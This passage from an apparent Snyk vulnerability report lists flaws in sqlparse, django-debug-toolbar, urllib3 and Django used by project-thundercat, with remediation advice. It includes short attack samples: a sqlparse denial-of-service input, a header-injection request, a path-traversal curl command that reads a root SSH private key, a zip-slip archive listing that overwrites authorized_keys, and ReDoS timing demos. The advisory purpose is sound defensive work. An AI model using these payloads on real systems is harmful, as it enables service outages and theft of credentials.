(1, 15672), (1, 15673), (1, 15674), (1, 15675), (1, 15676), (1, 15677), (1, 15678), (1, 15679), (1, 15680), (1, 15681), (1, 15682), (1, 15683), (1, 15684), (1, 15685), (1, 15686), (1, 15687), (1, 15688), (1, 15689), (1, 15690), (1, 15691), (1, 15692), (1, 15693), (1, 15694), (1, 15695), (1, 15696), (1, 15697), (1, 15698), (1, 15699), (1, 15700), (1, 15701), (1, 15702), (1, 15703), (1, 15704), (1, 15705), (1, 15706), (1, 15707), (1, 15708), (1, 15709), (1, 15710), (1, 15711), (1, 15712), (1, 15713), (1, 15714), (1, 15715), (1, 15716), (1, 15717), (1, 15718), (1, 15719), (1, 15720), (1, 15721), (1, 15722), (1, 15723), (1, 15724), (1, 15725), (1, 15726), (1, 15727), (1, 15728), (1, 15729), (1, 15730), (1, 15731), (1, 15732), (1, 15733), (1, 15734), (1, 15735), (1, 15736), (1, 15737), (1, 15738), (1, 15739), (1, 15740), (1, 15741), (1, 15742), (1, 15743), (1, 15744), (1, 15745), (1, 15746), (1, 15747), (1, 15748), (1, 15749), (1, 15750), (1, 15751), (1, 15752), (1, 15753), (1, 15754), (1, 15755), (1, 15756), (1, 15757), (1, 15758), (1, 15759), (1, 15760), (1, 15761), (1, 15762), (1, 15763), (1, 15764), (1, 15765), (1, 15766), (1, 15767), (1, 15768), (1, 15769), (1, 15770), (1, 15771), (1, 15772), (1, 15773), (1, 15774), (1, 15775), (1, 15776), (1, 15777), (1, 15778), (1, 15779), (1, 15780), (1, 15781), (1, 15782), (1, 15783), (1, 15784), (1, 15785), (1, 15786), (1, 15787), (1, 15788), (1, 15789), (1, 15790), (1, 15791), (1, 15792), (1, 15793), (1, 15794), (1, 15795), (1, 15796), (1, 15797), (1, 15798), (1, 15799), (1, 15800), (1, 15801), (1, 15802), (1, 15803), (1, 15804), (1, 15805), (1, 15806), (1, 15807), (1, 15808), (1, 15809), (1, 15810), (1, 15811), (1, 15812), (1, 15813), (1, 15814), (1, 15815), (1, 15816), (1, 15817), (1, 15818), (1, 15819), (1, 15820), (1, 15821), (1, 15822), (1, 15823), (1, 15824), (1, 15825), (1, 15826), (1, 15827), (1, 15828), (1, 15829), (1, 15830), (1, 15831), (1, 15832), (1, 15833), (1, 15834), (1, 15835), (1, 15836), (1, 15837), (1, 15838), (1, 15839), (1, 15840), (1, 15841), (1, 15842), (1, 15843), (1, 15844), (1, 15845), (1, 15846), (1, 15847), (1, 15848), (1, 15849), (1, 15850), (1, 15851), (1, 15852), (1, 15853), (1, 15854), (1, 15855), (1, 15856), (1, 15857), (1, 15858), (1, 15859), (1, 15860), (1, 15861), (1, 15862), (1, 15863), (1, 15864), (1, 15865), (1, 15866), (1, 15867), (1, 15868), (1, 15869), (1, 15870), (1, 15871), (1, 15872), (1, 15873), (1, 15874), (1, 15875), (1, 15876), (1, 15877), (1, 15878), (1, 15879), (1, 15880), (1, 15881), (1, 15882), (1, 15883), (1, 15884), (1, 15885), (1, 15886), (1, 15887), (1, 15888), (1, 15889), (1, 15890), (1, 15891), (1, 15892), (1, 15893), (1, 15894), (1, 15895), (1, 15896), (1, 15897), (1, 15898), (1, 15899), (1, 15900), (1, 15901), (1, 15902), (1, 15903), (1, 15904), (1, 15905), (1, 15906), (1, 15907), (1, 15908), (1, 15909), (1, 15910), (1, 15911), (1, 15912), (1, 15913), (1, 15914), (1, 15915), (1, 15916), (1, 15917), (1, 15918), (1, 15919), (1, 15920), (1, 15921), (1, 15922), (1, 15923), (1, 15924), (1, 15925), (1, 15926), (1, 15927), (1, 15928), (1, 15929), (1, 15930), (1, 15931), (1, 15932), (1, 15933), (1, 15934), (1, 15935), (1, 15936), (1, 15937), (1, 15938), (1, 15939), (1, 15940), (1, 15941), (1, 15942), (1, 15943), (1, 15944), (1, 15945), (1, 15946), (1, 15947), (1, 15948), (1, 15949), (1, 15950), (1, 15951), (1, 15952), (1, 15953), (1, 15954), (1, 15955), (1, 15956), (1, 15957), (1, 15958), (1, 15959), (1, 15960), (1, 15961), (1, 15962), (1, 15963), (1, 15964), (1, 15965), (1, 15966), (1, 15967), (1, 15968), (1, 15969), (1, 15970), (1, 15971), (1, 15972), (1, 15973), (1, 15974), (1, 15975), (1, 15976), (1, 15977), (1, 15978), (1, 15979), (1, 15980), (1, 15981), (1, 15982), (1, 15983), (1, 15984), (1, 15985), (1, 15986), (1, 15987), (1, 15988), (1, 15989), (1, 15990), (1, 15991), (1, 15992), (1, 15993), (1, 15994), (1, 15995), (1, 15996), (1, 15997), (1, 15998), (1, 15999), (1, 16000), (1, 16001), (1, 16002), (1, 16003), (1, 16004), (1, 16005), (1, 16006), (1, 16007), (1, 16008), (1, 16009), (1, 16010), (1, 16011), (1, 16012), (1, 16013), (1, 16014), (1, 16015), (1, 16016), (1, 16017), (1, 16018), (1, 16019), (1, 16020), (1, 16021), (1, 16022), (1, 16023), (1, 16024), (1, 16025), (1, 16026), (1, 16027), (1, 16028), (1, 16029), (1, 16030), (1, 16031), (1, 16032), (1, 16033), (1, 16034), (1, 16035), (1, 16036), (1, 16037), (1, 16038), (1, 16039), (1, 16040), (1, 16041), (1, 16042), (1, 16043), (1, 16044), (1, 16045), (1, 16046), (1, 16047), (1, 16048), (1, 16049), (1, 16050), (1, 16051), (1, 16052), (1, 16053), (1, 16054), (1, 16055), (1, 16056), (1, 16057), (1, 16058), (1, 16059), (1, 16060), (1, 16061), (1, 16062), (1, 16063), (1, 16064), (1, 16065), (1, 16066), (1, 16067), (1, 16068), (1, 16069), (1, 16070), (1, 16071), (1, 16072), (1, 16073), (1, 16074), (1, 16075), (1, 16076), (1, 16077), (1, 16078), (1, 16079), (1, 16080), (1, 16081), (1, 16082), (1, 16083), (1, 16084), (1, 16085), (1, 16086), (1, 16087), (1, 16088), (1, 16089), (1, 16090), (1, 16091), (1, 16092), (1, 16093), (1, 16094), (1, 16095), (1, 16096), (1, 16097), (1, 16098), (1, 16099), (1, 16100), (1, 16101), (1, 16102), (1, 16103), (1, 16104), (1, 16105), (1, 16106), (1, 16107), (1, 16108), (1, 16109), (1, 16110), (1, 16111), (1, 16112), (1, 16113), (1, 16114), (1, 16115), (1, 16116), (1, 16117), (1, 16118), (1, 16119), (1, 16120), (1, 16121), (1, 16122), (1, 16123), (1, 16124), (1, 16125), (1, 16126), (1, 16127), (1, 16128), (1, 16129), (1, 16130), (1, 16131), (1, 16132), (1, 16133), (1, 16134), (1, 16135), (1, 16136), (1, 16137), (1, 16138), (1, 16139), (1, 16140), (1, 16141), (1, 16142), (1, 16143), (1, 16144), (1, 16145), (1, 16146), (1, 16147), (1, 16148), (1, 16149), (1, 16150), (1, 16151), (1, 16152), (1, 16153), (1, 16154), (1, 16155), (1, 16156), (1, 16157), (1, 16158), (1, 16159), (1, 16160), (1, 16161), (1, 16162), (1, 16163), (1, 16164), (1, 16165), (1, 16166), (1, 16167), (1, 16168), (1, 16169), (1, 16170), (1, 16171), (1, 16172), (1, 16173), (1, 16174), (1, 16175), (1, 16176), (1, 16177), (1, 16178), (1, 16179), (1, 16180), (1, 16181), (1, 16182), (1, 16183), (1, 16184), (1, 16185), (1, 16186), (1, 16187), (1, 16188), (1, 16189), (1, 16190), (1, 16191), (1, 16192), (1, 16193), (1, 16194), (1, 16195), (1, 16196), (1, 16197), (1, 16198), (1, 16199), (1, 16200), (1, 16201), (1, 16202), (1, 16203), (1, 16204), (1, 16205), (1, 16206), (1, 16207), (1, 16208), (1, 16209), (1, 16210), (1, 16211), (1, 16212), (1, 16213), (1, 16214), (1, 16215), (1, 16216), (1, 16217), (1, 16218), (1, 16219), (1, 16220), (1, 16221), (1, 16222), (1, 16223), (1, 16224), (1, 16225), (1, 16226), (1, 16227), (1, 16228), (1, 16229), (1, 16230), (1, 16231), (1, 16232), (1, 16233), (1, 16234), (1, 16235), (1, 16236), (1, 16237), (1, 16238), (1, 16239), (1, 16240), (1, 16241), (1, 16242), (1, 16243), (1, 16244), (1, 16245), (1, 16246), (1, 16247), (1, 16248), (1, 16249), (1, 16250), (1, 16251), (1, 16252), (1, 16253), (1, 16254), (1, 16255), (1, 16256), (1, 16257), (1, 16258), (1, 16259), (1, 16260), (1, 16261), (1, 16262), (1, 16263), (1, 16264), (1, 16265), (1, 16266), (1, 16267), (1, 16268), (1, 16269), (1, 16270), (1, 16271), (1, 16272), (1, 16273), (1, 16274), (1, 16275), (1, 16276), (1, 16277), (1, 16278), (1, 16279), (1, 16280), (1, 16281), (1, 16282), (1, 16283), (1, 16284), (1, 16285), (1, 16286), (1, 16287), (1, 16288), (1, 16289), (1, 16290), (1, 16291), (1, 16292), (1, 16293), (1, 16294), (1, 16295), (1, 16296), (1, 16297), (1, 16298), (1, 16299), (1, 16300), (1, 16301), (1, 16302), (1, 16303), (1, 16304), (1, 16305), (1, 16306), (1, 16307), (1, 16308), (1, 16309), (1, 16310), (1, 16311), (1, 16312), (1, 16313), (1, 16314), (1, 16315), (1, 16316), (1, 16317), (1, 16318), (1, 16319), (1, 16320), (1, 16321), (1, 16322), (1, 16323), (1, 16324), (1, 16325), (1, 16326), (1, 16327), (1, 16328), (1, 16329), (1, 16330), (1, 16331), (1, 16332), (1, 16333), (1, 16334), (1, 16335), (1, 16336), (1, 16337), (1, 16338), (1, 16339), (1, 16340), (1, 16341), (1, 16342), (1, 16343), (1, 16344), (1, 16345), (1, 16346), (1, 16347), (1, 16348), (1, 16349), (1, 16350), (1, 16351), (1, 16352), (1, 16353), (1, 16354), (1, 16355), (1, 16356), (1, 16357), (1, 16358), (1, 16359), (1, 16360), (1, 16361), (1, 16362), (1, 16363), (1, 16364), (1, 16365), (1, 16366), (1, 16367), (1, 16368), (1, 16369), (1, 16370), (1, 16371), (1, 16372), (1, 16373), (1, 16374), (1, 16375), (1, 16376), (1, 16377), (1, 16378), (1, 16379), (1, 16380), (1, 16381), (1, 16382), (1, 16383), (1, 16384))
"""

sqlparse.format(sql, reindent=True, keyword_case="upper")

Remediation

Upgrade sqlparse to version 0.5.4 or higher.

References

GitHub Commit

Allocation of Resources Without Limits or Throttling vulnerability report

high severity

SQL Injection

Vulnerable module: django-debug-toolbar
Introduced through: django-debug-toolbar@1.11

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11

Remediation: Upgrade to django-debug-toolbar@1.11.1.

Overview

django-debug-toolbar is an A configurable set of panels that display various debug information about the current request/response.

Affected versions of this package are vulnerable to SQL Injection in the SQL Panel in Jazzband Django Debug Toolbar. It allows attackers to execute SQL statements by changing the raw_sql input field of the SQL explain, analyze, or select form.

Remediation

Upgrade django-debug-toolbar to version 1.11.1, 2.2.1, 3.2.1 or higher.

References

SQL Injection vulnerability report

high severity

new

Insertion of Sensitive Information Into Sent Data

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@2.7.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to Insertion of Sensitive Information Into Sent Data in urlopen() when using ProxyManager.connection_from_url() with assert_same_host=False, directly rather than via the high-level APIs including urllib3.request(), PoolManager.request(), and ProxyManager.request(). An attacker can expose headers such as Authorization, Cookie, and Proxy-Authorization by triggering cross-origin redirects, which does not properly invoke remove_headers_on_redirect.

Remediation

Upgrade urllib3 to version 2.7.0 or higher.

References

Insertion of Sensitive Information Into Sent Data vulnerability report

high severity

SQL Injection

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@4.2.28.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to SQL Injection via the band index parameter band_lhs in check_raster lookups when using PostGIS. An attacker can execute arbitrary SQL commands by supplying crafted input to this parameter.

Remediation

Upgrade Django to version 4.2.28, 5.2.11, 6.0.2 or higher.

References

SQL Injection vulnerability report

high severity

HTTP Header Injection

Vulnerable module: urllib3
Introduced through: urllib3@1.24.3, requests@2.21.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › urllib3@1.24.3

Remediation: Upgrade to urllib3@1.25.9.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to requests@2.32.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to coreapi@2.3.3.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Remediation: Upgrade to openapi-codec@1.3.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-rest-swagger@2.2.0 › openapi-codec@1.3.2 › coreapi@2.3.3 › requests@2.21.0 › urllib3@1.24.3

Overview

urllib3 is a HTTP library with thread-safe connection pooling, file post, and more.

Affected versions of this package are vulnerable to HTTP Header Injection. The 'method' parameter is not filtered to prevent the injection from altering the entire request.

For example:

>>> conn = http.client.HTTPConnection("localhost", 80)
>>> conn.request(method="GET / HTTP/1.1\r\nHost: abc\r\nRemainder:", url="/index.html")

This will result in the following request being generated:

GET / HTTP/1.1
Host: abc
Remainder: /index.html HTTP/1.1
Host: localhost
Accept-Encoding: identity

Remediation

Upgrade urllib3 to version 1.25.9 or higher.

References

HTTP Header Injection vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.27.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) via an infinite loop during file parsing that occurs when certain inputs are passed to multipart forms.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 2.2.27, 3.2.12, 4.0.2 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.18.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) when parsing multipart form data in http/multipartparser.py. An attacker can trigger the opening of a large number of uploaded files which are not subsequently closed, consuming memory or filehandling resources.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 3.2.18, 4.0.10, 4.1.7 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Denial of Service (DoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.21.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) in the django.utils.encoding.uri_to_iri() function when processing inputs with a large number of Unicode characters.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

Two common types of DoS vulnerabilities:

High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.
Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade django to version 3.2.21, 4.1.11, 4.2.5 or higher.

References

Denial of Service (DoS) vulnerability report

high severity

Directory Traversal

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@2.2.24.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.

Affected versions of this package are vulnerable to Directory Traversal via admindocs TemplateDetailView.

Details

A Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.

Directory Traversal vulnerabilities can be generally divided into two types:

Information Disclosure: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.

st is a module for serving static files on web pages, and contains a vulnerability of this type. In our example, we will serve files from the public route.

If an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.

curl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa

Note %2e is the URL encoded version of . (dot).

Writing arbitrary files: Allows the attacker to create or replace existing files. This type of vulnerability is also known as Zip-Slip.

One way to achieve this is by using a malicious zip archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.

The following is an example of a zip archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in /root/.ssh/ overwriting the authorized_keys file:

2018-04-15 22:04:29 .....           19           19  good.txt
2018-04-15 22:04:42 .....           20           20  ../../../../../../root/.ssh/authorized_keys

Remediation

Upgrade Django to version 3.2.4, 3.1.12, 2.2.24 or higher.

References

Directory Traversal vulnerability report

high severity

Regular Expression Denial of Service (ReDoS)

Vulnerable module: django
Introduced through: django@2.1.7, django-cors-headers@3.0.0 and others

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django@2.1.7

Remediation: Upgrade to django@3.2.20.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-cors-headers@3.0.0 › django@2.1.7

Remediation: Upgrade to django-cors-headers@3.0.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › django@2.1.7

Remediation: Upgrade to django-debug-toolbar@1.11.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › djangorestframework-simplejwt@4.3.0 › django@2.1.7

Remediation: Upgrade to djangorestframework-simplejwt@4.7.0.

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the EmailValidator and URLValidator classes, when processing a very large number of domain name labels on emails or URLs.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

CCC
CC+C
C+CC
C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade django to version 3.2.20, 4.1.10, 4.2.3 or higher.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

high severity

Regular Expression Denial of Service (ReDoS)

Vulnerable module: sqlparse
Introduced through: sqlparse@0.3.0 and django-debug-toolbar@1.11

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › sqlparse@0.3.0

Remediation: Upgrade to sqlparse@0.4.2.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › sqlparse@0.3.0

Remediation: Upgrade to django-debug-toolbar@3.2.3.

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The formatter function that strips comments from a SQL contains a regular expression that is vulnerable to ReDoS. The regular expression may cause exponential backtracking on strings containing many repetitions of \r\n in SQL comments.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade sqlparse to version 0.4.2 or higher.

References

GitHub Commit

Regular Expression Denial of Service (ReDoS) vulnerability report

high severity

Regular Expression Denial of Service (ReDoS)

Vulnerable module: sqlparse
Introduced through: sqlparse@0.3.0 and django-debug-toolbar@1.11

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › sqlparse@0.3.0

Remediation: Upgrade to sqlparse@0.4.4.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › sqlparse@0.3.0

Remediation: Upgrade to django-debug-toolbar@3.2.3.

Overview

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to using an inefficient pattern which can cause excessive backtracking, leading to performance degradation.

Details

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

A The string must start with the letter 'A'
(B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

CCC
CC+C
C+CC
C+C+C.

From there, the number of steps the engine must use to validate a string just continues to grow.

String	Number of C's	Number of steps
ACCCX	3	38
ACCCCX	4	71
ACCCCCX	5	136
ACCCCCCCCCCCCCCX	14	65,553

Remediation

Upgrade sqlparse to version 0.4.4 or higher.

References

Regular Expression Denial of Service (ReDoS) vulnerability report

high severity

Uncontrolled Recursion

Vulnerable module: sqlparse
Introduced through: sqlparse@0.3.0 and django-debug-toolbar@1.11

Detailed paths

Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › sqlparse@0.3.0

Remediation: Upgrade to sqlparse@0.5.0.
Introduced through: code-for-canada/project-thundercat@code-for-canada/project-thundercat › django-debug-toolbar@1.11 › sqlparse@0.3.0

Remediation: Upgrade to django-debug-toolbar@3.2.3.

Overview

Affected versions of this package are vulnerable to Uncontrolled Recursion due to the parsing of heavily nested lists. An attacker can cause the application to crash by submitting a specially crafted list that triggers a RecursionError.

Note: The impact depends on the use, so anyone parsing a user input with sqlparse.parse() is affected.

PoC


import sqlparse
